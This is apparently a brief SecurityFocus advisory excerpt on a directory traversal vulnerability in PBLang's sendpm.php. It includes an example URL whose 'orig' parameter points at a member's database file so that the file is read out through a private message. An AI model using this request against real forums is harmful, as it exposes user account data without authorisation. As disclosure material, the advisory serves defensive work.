PBLang Bulletin Board System SendPM.PHP Directory Traversal Vulnerability

The following example is available:

http://www.example.com/pblang/sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=/home/public_html/pblang/db/members/[username]


 

Privacy Statement
Copyright 2010, SecurityFocus